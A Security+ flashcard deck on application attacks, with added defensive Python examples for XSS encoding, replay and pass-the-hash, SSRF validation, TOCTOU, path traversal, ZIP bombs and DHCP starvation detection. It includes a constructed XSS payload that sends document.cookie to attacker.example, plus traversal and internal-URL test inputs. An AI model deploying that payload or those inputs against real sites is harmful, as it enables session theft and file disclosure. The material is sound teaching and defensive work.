1.3 - Application Attacks Flashcards

1
Q

Define privilege escalation attack.

A

A cyberattack that gains illicit access to elevated rights, permissions, entitlements, or privileges beyond what is assigned to an identity, account, user, or machine.

2
Q

Define horizontal privilege escalation.

A

When a user gains access to the accounts or data of another user at the same privilege level (for example, reading another customer's orders by changing an ID in the URL). Contrast with vertical escalation, where the attacker gains privileges higher than their own (ordinary user to administrator).

3
Q

List a few ways that you can mitigate privilege escalation.

A

1) Patch quickly
2) Updated anti-virus/anti-malware software
3) Data execution prevention (DEP)
- Memory pages that hold data (stack, heap) are marked non-executable, so code
injected into those regions cannot run; only pages marked executable can
4) Address space layout randomization (ASLR)
- Randomizes the base addresses of the stack, heap, and libraries on each run, so a
buffer overflow exploit cannot rely on jumping to a known memory address

4
Q

What is Cross-site Scripting (XSS)?

A

A type of attack that injects some kind of malicious script that is executed in the web browser.

5
Q

Name three types of Cross-Site Scripting (XSS).

A

1) Reflected XSS
2) Stored XSS
3) DOM-based XSS

6
Q

What is a Reflected XSS attack?

A

When a malicious script is reflected off a web application into the victim's browser. The payload arrives in the current HTTP request (a query parameter, form field, or URL path) and the server echoes it back into the response without encoding it. The victim is typically lured into clicking a crafted link that carries the payload to the vulnerable site.

7
Q

What is a DOM-based XSS attack?

A

When the attack payload executes because the page's own client-side JavaScript reads attacker-controlled data (for example from location.hash or document.URL) and writes it into the DOM unsafely, so the legitimate script runs in an unexpected way. The vulnerability exists in client-side code rather than server-side code; the payload may never reach the server at all.

8
Q

What is a Stored XSS attack?

A

When an application receives data from an untrusted source and includes that data within its later HTTP responses in an unsafe way. This is only possible if your application is designed to store user input (a message board or social media website).

9
Q

List a few ways to protect against XSS.

A

1) Be careful when clicking untrusted links
2) Consider disabling JavaScript
3) Keep your browser and applications updated
4) Validate input and encode output
- Don't allow users to add their own scripts to an
input field, and encode untrusted data for the context it is written into
(HTML body, attribute, JavaScript, URL) so the browser treats it as text, not markup
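
Added example (not part of the original flashcard deck): the same user-supplied text rendered into a page with and without output encoding, covering both the reflected case (card 6, payload from the current request) and the stored case (card 8, payload saved earlier and emitted to every later visitor). The page fragments, the has_live_script check and the payload are constructed for illustration.

```python
import html

# Constructed payload of the kind a reflected-XSS link or a stored comment carries.
PAYLOAD = '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>'


def render_search_vulnerable(term):
    """Reflected XSS: the search term from the current request is copied into the
    page verbatim, so the browser parses the attacker's <script> as markup."""
    return "<h1>Results for: %s</h1>" % term


def render_search_safe(term):
    """html.escape converts < > & " ' to entities at output time, so the browser
    renders the payload as text. This encoder is correct for the HTML body and
    quoted attributes only; JavaScript, URL and CSS contexts need their own."""
    return "<h1>Results for: %s</h1>" % html.escape(term, quote=True)


def render_comments(comments, escape=True):
    """Stored XSS: comments saved earlier are emitted into every later response,
    so one poisoned record hits every visitor. escape=False reproduces the bug."""
    enc = (lambda s: html.escape(s, quote=True)) if escape else (lambda s: s)
    return "<ul>" + "".join("<li>%s</li>" % enc(c) for c in comments) + "</ul>"


def has_live_script(page):
    """Demo check: does the page still contain a real <script tag for the parser?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    print(has_live_script(render_search_vulnerable(PAYLOAD)))   # True
    print(has_live_script(render_search_safe(PAYLOAD)))         # False
    print(render_search_safe(PAYLOAD))                          # entities, not markup
    print(has_live_script(render_comments(["hi", PAYLOAD])))    # False
```

Input validation (card 9, item 4) still matters, but the encoding step is what makes the difference here: the payload is stored and reflected unchanged in both versions, and only the safe renderer prevents the browser from executing it.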

10
Q

Define a code injection attack.

A

When an attacker supplies input that the application ends up interpreting as code, commands, or queries (SQL, LDAP, XML, shell commands, DLLs). This is possible when the application builds such statements from untrusted input without validation or proper escaping.

11
Q

Define a SQL injection.

A

An attack that injects malicious SQL code into an application, allowing the attacker to view or modify a database.

12
Q

What is an LDAP Injection?

A

An attack in which LDAP search filters are built from untrusted input without validation or escaping. Injected filter metacharacters such as *, (, ), | and & change the logic of the filter, letting the attacker bypass authentication, read entries they are not authorized to see, or modify content within the LDAP tree. Similar to SQL injection.

13
Q

What is an XML Injection?

A

An attack technique used to manipulate or compromise the logic of an XML application or service. The injection of unintended XML content and/or structures into an XML message can alter the intended logic of the application to perform unauthorized actions or access sensitive data.

14
Q

What is a DLL Injection?

A

An attack technique that lets an attacker run arbitrary code inside the memory of another process by forcing that process to load a foreign DLL file (classically by writing the DLL's path into the target process and starting a thread that calls the library loader). The injected code then runs with the target process's privileges, allowing unauthorized actions.

15
Q

Define a buffer overflow.

A

Occurs when the amount of data in the buffer exceeds its storage capacity. That extra data overflows into adjacent memory locations and corrupts or overwrites the data in those locations.

16
Q

Define replay attack.

A

A type of network attack in which an attacker captures a valid network transmission and then transmits it later. The main objective is to trick the system into accepting the retransmission of the data as a legitimate one.

17
Q

Define a pass the hash attack.

A

A type of replay attack in which an attacker obtains a user's password hash (as opposed to the password characters), for example by dumping it from memory or the local account database on a compromised host or by capturing it from the network, and then presents the hash itself to authenticate to other networked systems for lateral movement. It works against protocols such as NTLM, where proving knowledge of the hash is enough to log on.

18
Q

Identify some ways that you can prevent a pass the hash attack.

A

1) Salting the hash
2) Encryption
3) Use a session ID or nonce with the password hash to create
a unique authentication hash each time
- Caveat: the per-session value stops an attacker from replaying a captured response, but an attacker who already holds the hash can still compute a fresh valid response. Stopping that means keeping privileged hashes off untrusted machines: no administrator logons to workstations, unique local admin passwords, and the OS's credential isolation features.

19
Q

Define session hijacking.

A

A method of taking over a web user session by surreptitiously obtaining the session ID and masquerading as the authorized user.

20
Q

Identify a few ways to prevent replay attacks.

A

1) Encrypt end-to-end
- HTTPS
2) Encrypt end-to-somewhere
- VPN
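
Added example (not part of the original flashcard deck) tying together cards 16, 18 and 20: a toy challenge-response login in which the server issues a fresh random nonce and the client answers with HMAC(password_hash, nonce). It shows that a captured answer cannot be replayed, and also that an attacker who holds the stored hash itself can still answer a new challenge, which is exactly the pass-the-hash case. The Server class, the hash construction and the credential are constructed for illustration and are not a real protocol.

```python
import hashlib
import hmac
import os


def password_hash(password):
    """Stored verifier. Deliberately unsalted and password-derived only, so the
    client can recompute it from the password, as NTLM-style schemes do."""
    return hashlib.sha256(password.encode()).digest()


def challenge_response(secret_hash, nonce):
    """Both sides compute HMAC(hash, nonce); the nonce makes every answer unique."""
    return hmac.new(secret_hash, nonce, hashlib.sha256).digest()


class Server:
    def __init__(self, stored_hash):
        self.stored_hash = stored_hash
        self.outstanding = set()      # nonces issued but not yet answered

    def challenge(self):
        nonce = os.urandom(16)
        self.outstanding.add(nonce)
        return nonce

    def verify(self, nonce, response):
        """Accept one answer per issued nonce, and only if the HMAC matches."""
        if nonce not in self.outstanding:
            return False               # replayed, forged or already-consumed nonce
        self.outstanding.discard(nonce)
        return hmac.compare_digest(challenge_response(self.stored_hash, nonce), response)


def demo():
    """Returns (legit_login, replay_same_nonce, replay_fresh_nonce, pass_the_hash)."""
    server = Server(password_hash("correct horse"))

    # 1) Legitimate login: the client knows the password, derives the hash, answers.
    n1 = server.challenge()
    r1 = challenge_response(password_hash("correct horse"), n1)
    ok = server.verify(n1, r1)

    # 2) Replay: an on-path attacker captured (n1, r1) and resends it unchanged.
    replayed = server.verify(n1, r1)

    # 3) Captured answer against a fresh challenge: the HMAC no longer matches.
    n2 = server.challenge()
    stale = server.verify(n2, r1)

    # 4) Pass the hash: the attacker never learned the password but obtained the
    #    stored hash (dumped from a compromised host) and can answer any challenge.
    n3 = server.challenge()
    pth = server.verify(n3, challenge_response(server.stored_hash, n3))

    return ok, replayed, stale, pth


if __name__ == "__main__":
    print(demo())   # (True, False, False, True)
```

Step 4 is why "salt the hash" and "use a session ID" are replay defenses rather than pass-the-hash defenses: the nonce guarantees freshness of each exchange, but the hash is the long-term secret, and whoever holds it can always produce a fresh answer.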

21
Q

What is Cross-site Request Forgery?

A

An attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated. With a little help of social engineering, an attacker may trick the users of a web application into executing actions of the attacker’s choosing.

22
Q

What is Server-side Request Forgery?

A

An attacker abuses server functionality to access or modify resources. The server is tricked into making HTTP requests to internal resources or other servers on behalf of the attacker.
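
Added example (not part of the original flashcard deck): validating a user-supplied URL before the server fetches it, so the request cannot be pointed at loopback, internal RFC 1918 ranges or the link-local cloud metadata address. The allowlist of hosts, the function names and the sample URLs are constructed.

```python
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
# Constructed allowlist: the only external hosts this feature is meant to fetch from.
ALLOWED_HOSTS = {"images.example.com", "cdn.example.net"}


def is_internal_address(host):
    """True when host is an IP literal in loopback, RFC 1918, link-local (which
    covers cloud metadata endpoints such as 169.254.169.254), reserved, multicast
    or unspecified space. Plain hostnames return False here; see the note below."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_reserved or ip.is_multicast or ip.is_unspecified)


def is_safe_fetch_url(url):
    """Allowlist-first validation of a URL the server would fetch for a user."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False                         # file://, gopher://, dict:// and friends
    if parts.username is not None or parts.password is not None:
        return False                         # http://images.example.com@10.0.0.5/ trick
    host = (parts.hostname or "").lower()    # hostname strips [] from IPv6 literals
    if not host or is_internal_address(host):
        return False
    return host in ALLOWED_HOSTS


if __name__ == "__main__":
    for u in ["https://images.example.com/a.png", "http://169.254.169.254/latest/meta-data/",
              "http://127.0.0.1:8080/admin", "http://[::1]/", "file:///etc/passwd",
              "http://images.example.com@10.0.0.5/", "http://intranet.corp/"]:
        print("%-48s %s" % (u, is_safe_fetch_url(u)))
```

The allowlist is the real control; the literal-IP check only catches the obvious bypasses. A hostname on the allowlist is still resolved at fetch time, so the fetching code must also resolve the name, re-check the resulting address, and either refuse HTTP redirects or re-validate each hop, otherwise DNS rebinding or an open redirect on an allowed host lands the request inside anyway.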

23
Q

What is a Driver Manipulation attack?

A

A sophisticated attack in which a program attempts to modify a driver’s functionality. The program exploits the legitimate purpose of the driver.

24
Q

What is Shimming?

A

An application attempts to call an older driver, and the OS intercepts the call and redirects it to run the shim code instead. A driver shim is additional code that runs instead of, or in front of, the original driver so that older drivers appear compatible with the current OS. Attackers abuse the same mechanism: a malicious shim can be registered so the attacker's code runs every time the application calls the driver.

25
Q

What is Refactoring?

A

The process of rewriting the internal processing of the code, without changing its external behavior. It is usually done to correct problems related to software design.

26
Q

Define metamorphic malware.

A

Malware that is different each time it is downloaded in order to stay outside of anti-malware definitions. Can intelligently redesign itself. Uses refactoring.

27
Q

Define an SSL stripping/ HTTP downgrade attack.

A

A combination of an on-path (man-in-the-middle) attack with a downgrade attack. The attacker sits between the victim and the web server and keeps the victim's side of the connection on plain HTTP while speaking HTTPS to the server, so traffic that should have been encrypted passes through the attacker in the clear.

The visitor sends a plain HTTP request (typing a bare hostname, or following an http:// link). The server replies with a redirect to HTTPS, but the attacker intercepts that redirect, opens the HTTPS session with the website themselves, and relays the decrypted content back to the visitor over HTTP. Everything the visitor submits, including credentials, is visible to the attacker in the middle. HTTP Strict Transport Security (HSTS) counters this by telling browsers that have already seen the site to refuse plain HTTP for it.

28
Q

What are Race Conditions?

A

An undesirable situation that occurs when a device or system attempts to perform two or more operations at the same time, but because of the nature of the device or system, the operations must be done in the proper sequence to be done correctly. In security terms, an attacker who can time an action into the gap between two steps can make the program act on stale state.

29
Q

What is Time-of-Check to Time-of-Use (TOCTOU)?

A

A race condition in which a resource is checked for a particular value, such as whether a file exists or is a regular file, and that value changes before the resource is used, invalidating the check. The classic example is file based: a program checks a path, an attacker swaps in a symbolic link, and the program then opens the attacker's target instead of the file it checked.

Can also arise when multiple users access a resource at the same time and one of them changes it between another's check and use.
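
Added example (not part of the original flashcard deck): a check-then-open race on a file, with the attacker's move simulated in-process, beside a version that validates the file it actually opened. The temporary directory, file names and contents are constructed; the safe version relies on O_NOFOLLOW and symlinks, so it needs a POSIX system.

```python
import os
import stat
import tempfile


def read_regular_file_vulnerable(path, race_step=None):
    """Check (lstat) then use (open) as two separate operations on a *path*.
    race_step simulates an attacker who wins the race in the gap between them."""
    if not stat.S_ISREG(os.lstat(path).st_mode):
        raise PermissionError("not a regular file")
    if race_step:
        race_step()
    with open(path) as f:          # open() follows whatever the path points to now
        return f.read()


def read_regular_file_safe(path, race_step=None):
    """Open first, refusing to follow symlinks, then validate the descriptor.
    Check and use refer to the same open object, so nothing can be swapped in."""
    if race_step:
        race_step()                # attacker swaps the path before we open it
    fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)   # ELOOP if path is a symlink
    try:
        if not stat.S_ISREG(os.fstat(fd).st_mode):
            raise PermissionError("not a regular file")
        with os.fdopen(fd, "r") as f:
            fd = -1                # the file object now owns the descriptor
            return f.read()
    finally:
        if fd != -1:
            os.close(fd)


def demo():
    """Returns (normal_read, leaked_by_vulnerable, blocked_by_safe)."""
    with tempfile.TemporaryDirectory() as d:
        secret = os.path.join(d, "secret.txt")      # file the program must never read
        upload = os.path.join(d, "upload.txt")      # file the program is allowed to read

        def reset():
            if os.path.lexists(upload):
                os.remove(upload)
            with open(upload, "w") as f:
                f.write("harmless")

        def attacker_swaps():
            os.remove(upload)
            os.symlink(secret, upload)

        with open(secret, "w") as f:
            f.write("SECRET")
        reset()

        normal = read_regular_file_safe(upload)
        leaked = read_regular_file_vulnerable(upload, attacker_swaps)
        reset()
        try:
            read_regular_file_safe(upload, attacker_swaps)
            blocked = False
        except OSError:            # O_NOFOLLOW refuses the planted symlink
            blocked = True
        return normal, leaked, blocked


if __name__ == "__main__":
    print(demo())   # ('harmless', 'SECRET', True)
```

The general rule the safe version follows: perform the check on the object you hold open (fstat on the descriptor), never on a name, because a name can be rebound by anyone who can write the containing directory.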

30
Q

What is a memory leak?

A

A type of resource leak that occurs when a computer program incorrectly manages memory allocations in a way that memory which is no longer needed is not released.

31
Q

Define NULL Pointer dereference.

A

A bug in which a program dereferences a pointer that holds NULL (points to nothing) instead of a valid memory address. The application crashes, often with debug information displayed, and an attacker who can trigger the condition on demand can cause a DoS.

32
Q

What is an Integer Overflow?

A

When you attempt to store in an integer variable a value larger than the maximum the variable can hold. In most languages the value silently wraps around (for example, a 32-bit unsigned value of 4294967295 plus 1 becomes 0), so a size or length check that was meant to reject a large value can pass, leading to undersized buffers and overflows.

33
Q

Define a directory traversal/ path traversal attack.

A

An attack that takes advantage of a web server or application vulnerability that lets the attacker read files outside the web root, typically by supplying path components such as ../ (or URL-encoded forms like %2e%2e%2f) in a filename parameter.
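
Added example (not part of the original flashcard deck): resolving a user-supplied filename against a fixed document root and refusing anything that escapes it. The root path, the helper names and the request paths are constructed; the root need not exist for the check to work.

```python
import os
from urllib.parse import unquote


def resolve_under_root(root, user_path):
    """Return the absolute path the server may open, or None if user_path escapes root.

    Decoding runs twice so %2e%2e and %252e%252e both collapse to '..' before the
    check; realpath then normalizes '..' and follows symlinks, so the containment
    test is made on the path the OS would actually open."""
    root = os.path.realpath(root)
    decoded = unquote(unquote(user_path)).replace("\\", "/")
    candidate = os.path.realpath(os.path.join(root, decoded.lstrip("/")))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


def is_contained(root, user_path):
    return resolve_under_root(root, user_path) is not None


if __name__ == "__main__":
    for p in ["images/logo.png", "../../etc/passwd", "%2e%2e/%2e%2e/etc/passwd",
              "..\\..\\windows\\win.ini", "/etc/passwd", "images/../index.html"]:
        print("%-32s -> %s" % (p, resolve_under_root("/srv/www", p)))
```

Filters that strip "../" once are bypassed by inputs like "....//"; this version does not try to remove anything and instead asks the OS what the final path is, then checks that it is under the root. The returned path is the one to open, so the check and the use agree.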

34
Q

What are some examples of improper error handling?

A

1) Too much detail
2) Network information
3) Memory dump
4) Stack traces
5) Database dump

35
Q

How should input be handled in an application?

A

All input should be considered malicious.

36
Q

What are some examples of consequences of improper input handling?

A

SQL injections, buffer overflows, DoS

37
Q

Define a resource exhaustion attack.

A

A specialized DoS attack that uses up a computer or server’s resources.

Ex. ZIP bomb: the well-known 42.zip is a 42 kilobyte archive of nested zips that expands to about 4.5 petabytes
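
Added example (not part of the original flashcard deck): checking a ZIP archive's declared sizes before extracting anything, and refusing archives whose expansion ratio, total size, entry count or nesting looks like a bomb. The sample archives are built in memory from constructed data and the limits are assumed policy values.

```python
import io
import os
import zipfile

# Assumed policy limits for the demo; tune to what the service genuinely needs.
MAX_TOTAL_UNCOMPRESSED = 50 * 1024 * 1024
MAX_RATIO = 100
MAX_ENTRIES = 1000


def check_zip(data):
    """Return (ok, reason) from the central-directory metadata alone. Nothing is
    decompressed, so rejecting a bomb costs almost no CPU or memory."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        infos = zf.infolist()
        if len(infos) > MAX_ENTRIES:
            return False, "too many entries (%d)" % len(infos)
        total = sum(i.file_size for i in infos)
        compressed = sum(i.compress_size for i in infos)
        if total > MAX_TOTAL_UNCOMPRESSED:
            return False, "declared size %d exceeds limit" % total
        if compressed and total / compressed > MAX_RATIO:
            return False, "ratio %.0f:1 looks like a bomb" % (total / compressed)
        if any(i.filename.lower().endswith(".zip") for i in infos):
            return False, "nested archive"   # 42.zip-style bombs hide behind a small outer ratio
    return True, "ok"


def build_zip(entries):
    """Build an archive in memory from (name, bytes) pairs."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in entries:
            zf.writestr(name, content)
    return buf.getvalue()


def bomb_sample():
    """Constructed: 20 MiB of zeros deflates to a few tens of KB, a ratio near 1000:1."""
    return build_zip([("zeros.bin", b"\0" * (20 * 1024 * 1024))])


def benign_sample():
    """Constructed: 64 KiB of random bytes does not compress, ratio about 1:1."""
    return build_zip([("notes.bin", os.urandom(64 * 1024))])


if __name__ == "__main__":
    print(check_zip(bomb_sample()))     # (False, 'ratio ...:1 looks like a bomb')
    print(check_zip(benign_sample()))   # (True, 'ok')
```

The sizes in the central directory are attacker-controlled and can be forged, so this check is a cheap first gate, not the whole defense: the extraction loop should still read each entry in chunks and stop as soon as the running byte count passes the limit.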

38
Q

Define a DHCP starvation.

A

Attacker floods the DHCP server with DHCPDISCOVER requests from many spoofed client MAC addresses until the server's address pool is exhausted and legitimate clients cannot obtain a lease. It is often a precursor to placing a rogue DHCP server on the network. DHCP snooping and port security (limiting the number of MAC addresses per switch port) are the usual mitigations.
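
Added example (not part of the original flashcard deck): spotting a starvation attempt in DHCP server logs by counting how many distinct client MACs send DHCPDISCOVER on one interface within a short window. The log lines are constructed in the style of ISC dhcpd syslog output; the window and threshold are assumed values.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Matches ISC-dhcpd-style syslog lines; only DISCOVER messages matter for starvation.
DISCOVER_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ dhcpd\[\d+\]: "
    r"DHCPDISCOVER from (?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2}) via (?P<iface>\S+)"
)


def parse_discover(line):
    """Return (timestamp, mac, iface) for a DHCPDISCOVER line, else None."""
    m = DISCOVER_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(re.sub(r"\s+", " ", m.group("ts")), "%b %d %H:%M:%S")
    return ts, m.group("mac").lower(), m.group("iface")


def detect_starvation(lines, window_seconds=10, max_distinct_macs=20):
    """Return one alert per interface that sees more than max_distinct_macs
    different DISCOVER sources within window_seconds. A healthy segment produces
    a handful of MACs per window; a starvation tool cycles through thousands."""
    recent = defaultdict(deque)       # iface -> deque of (ts, mac), oldest first
    alerts, alerted = [], set()
    for line in lines:
        parsed = parse_discover(line)
        if parsed is None:
            continue
        ts, mac, iface = parsed
        q = recent[iface]
        q.append((ts, mac))
        while (ts - q[0][0]).total_seconds() > window_seconds:
            q.popleft()
        distinct = len({m for _, m in q})
        if distinct > max_distinct_macs and iface not in alerted:
            alerts.append((iface, ts.strftime("%H:%M:%S"), distinct))
            alerted.add(iface)
    return alerts


def sample_log():
    """Constructed syslog excerpt: a quiet eth0, then a burst of spoofed MACs on eth1."""
    lines = ["Mar  3 09:00:%02d dhcp1 dhcpd[812]: DHCPDISCOVER from 00:1a:2b:3c:4d:%02x via eth0"
             % (10 * i, i) for i in range(5)]
    lines += ["Mar  3 09:01:%02d dhcp1 dhcpd[812]: DHCPDISCOVER from de:ad:be:ef:00:%02x via eth1"
              % (i // 10, i) for i in range(40)]
    lines.append("Mar  3 09:01:05 dhcp1 dhcpd[812]: DHCPOFFER on 10.0.0.50 to de:ad:be:ef:00:03 via eth1")
    return lines


if __name__ == "__main__":
    print(detect_starvation(sample_log()))   # [('eth1', '09:01:02', 21)]
```

Counting distinct MACs rather than raw request volume is what separates starvation from a noisy but legitimate segment (a reboot storm repeats the same few MACs). The same logic fits a switch's DHCP snooping counters or a SIEM query over the dhcpd log.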
